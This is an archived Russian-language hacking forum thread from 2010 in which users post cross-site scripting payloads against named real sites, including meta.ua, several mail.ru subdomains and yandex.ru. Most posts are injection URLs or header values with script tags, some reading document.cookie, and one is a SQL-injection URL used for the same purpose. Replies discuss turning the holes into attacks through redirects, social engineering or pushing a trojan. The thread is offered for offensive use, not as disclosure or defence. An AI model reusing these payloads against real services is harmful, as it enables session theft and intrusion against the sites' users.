Старый 02.07.2010, 20:26   #1
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию XSS на почтовых серверах

В этой теме постим XSS только на почтовых серверах.
Ded MustD!e вне форума   Ответить с цитированием
Старый 06.07.2010, 15:30   #2
S0ulVortex
 
Аватар для S0ulVortex
 
Регистрация: 06.07.2010
Сообщений: 35
Репутация: 13
По умолчанию

Ну стану первооткрывателем этой темы
Сайт: meta.ua
Тип XSS: активная
Где: В заголовке письма при открытии
Пример:</title><script>alert('xss')</script>
Наличие </title> обязательно.
P.s Судя по пузомеркам PR 7 ТИЦ13000 думаю довольно известный почтовый сервер на украине )
P.s.s Нашел сам, но возможно кто-то её тоже нашел и до меня
S0ulVortex вне форума   Ответить с цитированием
Старый 09.07.2010, 10:16   #3
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

http://shop.deti.mail.ru/cabinet/login/

В Referer передаем "><script>alert(1)</script>
BlackFan вне форума   Ответить с цитированием
Старый 09.07.2010, 14:57   #4
bjong
 
Аватар для bjong
 
Регистрация: 09.07.2010
Сообщений: 2
Репутация: 1
По умолчанию

Код:
_http://wap.hero.mail.ru/rules.do?p=0&gameId="><script>alert(document.cookie)</script>
bjong вне форума   Ответить с цитированием
Старый 09.07.2010, 23:04   #5
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

Код:
http://wap.lordmancer.mail.ru/index.php?p=40"><script>alert(1)</script>&nid=123
http://wap.hero.mail.ru/rating.do?gameId=69&date=10-07-2010<script>alert(1)</script>
http://wap.hero.mail.ru/addmsg.do?gameId=69"><script>alert(1)</script>
BlackFan вне форума   Ответить с цитированием
Старый 10.07.2010, 19:27   #6
Dr.TRO
 
Аватар для Dr.TRO
 
Регистрация: 06.07.2010
Сообщений: 90
Репутация: 21
По умолчанию

Цитата:
Сообщение от BlackFan Посмотреть сообщение
http://shop.deti.mail.ru/cabinet/login/

В Referer передаем "><script>alert(1)</script>
есть ли смысл в этой хсс?) если ее проводить нужно си, если пользоваться си то лучше уж вообще развести либо трояна впарить.
__________________
http://fc01.deviantart.net/fs48/f/20...eyecixramd.png
http://img156.imageshack.us/img156/2...userbartd7.png
Цитата:
root@rdot.org ~ # perl -MAcme::BadExample
Dr.TRO вне форума   Ответить с цитированием
Старый 10.07.2010, 20:31   #7
life_glider
 
Аватар для life_glider
 
Регистрация: 06.07.2010
Сообщений: 43
Репутация: 17
По умолчанию

Цитата:
Сообщение от Dr.TRO Посмотреть сообщение
есть ли смысл в этой хсс?) если ее проводить нужно си, если пользоваться си то лучше уж вообще развести либо трояна впарить.
а редирект с нормальной страницы на страницу с данным урл? редирект куда надо.
http://wap.lordmancer.mail.ru/index.php?ma=hero-profile&heroID=80878+union+select+concat_ws%280x3a ,%27%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%27,user%28%29,database%28%29%29,2,3&p=27
было в sql-inj можно использовать и как xss
__________________
Вы все такие классные
life_glider вне форума   Ответить с цитированием
Старый 11.07.2010, 00:28   #8
Dr.TRO
 
Аватар для Dr.TRO
 
Регистрация: 06.07.2010
Сообщений: 90
Репутация: 21
По умолчанию

Специально проверил создал файл на лохосте с названием "><script>alert(31337);<" (</script> не выйдет так как в название слешы запрещены) и как результат:

Цитата:
Referer: http://localhost/%22%3E%3Cscript%3Ealert(31337);%3C%22
То что я и говорил, а использовать SQL Inj как XSS это в случае если очень надо и ничего сделать неможешь больше, сначала называлось сее чудо SiXSS если не ошибаюс, а потом milw0rm'ы и аналоги с сотнями школот посоздавали этот же метод снова же но с другим названием.

Товарищ молодец что нашел, что работал, просто толку 0 от нее для нас нету.
__________________
http://fc01.deviantart.net/fs48/f/20...eyecixramd.png
http://img156.imageshack.us/img156/2...userbartd7.png
Цитата:
root@rdot.org ~ # perl -MAcme::BadExample
Dr.TRO вне форума   Ответить с цитированием
Старый 11.08.2010, 13:13   #9
life_glider
 
Аватар для life_glider
 
Регистрация: 06.07.2010
Сообщений: 43
Репутация: 17
По умолчанию

http://www.yandex.ru/?add=28568&from=promocode
раньше можно было создать виджет указав в качестве сайта javascript:code
__________________
Вы все такие классные
life_glider вне форума   Ответить с цитированием
Старый 31.10.2010, 13:08   #10
DontForget
 
Аватар для DontForget
 
Регистрация: 31.10.2010
Сообщений: 8
Репутация: 0
Thumbs up

Давно не было пассивки на мэйл ру .
Код:
http://health.mail.ru/fitness/clubs/list?csw.rb_country_id=188&csw.name=Rdot&csw.region_ref=77&csw.networkable=1&csw.has_photos=1&csw.cf=16&csw.cf=35"><script>alert(document.cookie)</script>
DontForget вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot